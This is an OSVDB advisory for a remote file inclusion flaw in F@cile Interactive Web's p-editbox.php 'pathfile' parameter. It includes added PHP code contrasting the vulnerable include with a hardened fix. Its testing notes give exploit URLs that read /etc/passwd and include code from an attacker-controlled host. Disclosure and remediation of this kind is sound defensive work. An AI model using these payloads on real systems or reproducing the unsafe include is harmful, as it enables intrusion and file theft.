F@cile Interactive Web p-editbox.php pathfile Variable Remote File Inclusion

2006-05-27T11:04:47
ID OSVDB:26102
Type osvdb
Reporter Mustafa Can Bjorn(nukedx@nukedx.com)
Modified 2006-05-27T11:04:47

Description

Vulnerability Description

F@cile Interactive Web contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the p-editbox.php script not properly sanitizing user input supplied to the 'pathfile' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script, or to disclose the contents of arbitrary files on the system.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).
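The shape of the bug and of a fix, as an added illustration that is not the F@cile Interactive Web source code: only the parameter name pathfile comes from the advisory; the function names, the editboxes directory and the file-name policy are assumptions. With register_globals on, the query parameter silently becomes a PHP variable that include() then follows, either to a local file such as /etc/passwd or, where allow_url_fopen/allow_url_include permit it, to a remote one. The hardened form reads the parameter explicitly, accepts only a bare file name, and checks that the resolved path stays inside a fixed directory.

```php
<?php
// Added example, not the project's own code. The vulnerable shape below is an
// assumption about how a register_globals-dependent include looks; the fixed
// directory and name policy are likewise assumed.

// --- Vulnerable shape (assumed). Under register_globals=On the request
// ?pathfile=... creates $pathfile, and include() follows it wherever it points.
function vulnerable_editbox_include() {
    global $pathfile;          // populated from the query string by register_globals
    include($pathfile);        // /etc/passwd, a remote URL, or a UNC path on Windows
}

// --- Hardened shape. The assumed directory holding the legitimate edit-box files.
define('EDITBOX_DIR', __DIR__ . '/editboxes');

// Returns the absolute path of an allowed file, or null when the input is rejected.
function resolve_editbox_path($pathfile) {
    if (!is_string($pathfile) || $pathfile === '') {
        return null;
    }
    // Only a plain file name is accepted: slashes, backslashes, scheme prefixes
    // (http://, \\host\share), ".." and NUL bytes all fail this pattern.
    if (!preg_match('/^[A-Za-z0-9_-]+\.php$/', $pathfile)) {
        return null;
    }
    $base = realpath(EDITBOX_DIR);
    $real = realpath(EDITBOX_DIR . '/' . $pathfile);
    // realpath() returns false for a missing file; the prefix check also
    // catches a symlink inside the directory that points back out of it.
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

function hardened_editbox_include() {
    $pathfile = isset($_GET['pathfile']) ? $_GET['pathfile'] : '';
    $path = resolve_editbox_path($pathfile);
    if ($path === null) {
        header('HTTP/1.0 400 Bad Request');
        exit('invalid pathfile');
    }
    include $path;
}
```

Turning register_globals off removes the specific entry point the advisory describes, but the include itself stays dangerous as long as any request-supplied string reaches it unchecked; the allow-list plus realpath prefix check is what actually closes both the remote-inclusion and the local-file-disclosure paths.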

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

F@cile Interactive Web contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the p-editbox.php script not properly sanitizing user input supplied to the 'pathfile' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script, or to disclose the contents of arbitrary files on the system.

Manual Testing Notes

http://[target]/[FacilePath]/p-editbox.php?pathfile=/etc/passwd
http://[target]/[FacilePath]/p-editbox.php?pathfile=\\[attacker]\file.php

References:

Vendor URL: http://www.facile-web.it/
Secunia Advisory ID: 20358
Related OSVDB ID: 26100
Related OSVDB ID: 26101
Related OSVDB ID: 26103
Related OSVDB ID: 26104
Other Advisory URL: http://www.nukedx.com/?viewdoc=35
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0639.html
FrSIRT Advisory: ADV-2006-2036
CVE ID: CVE-2006-2745
Bugtraq ID: 18149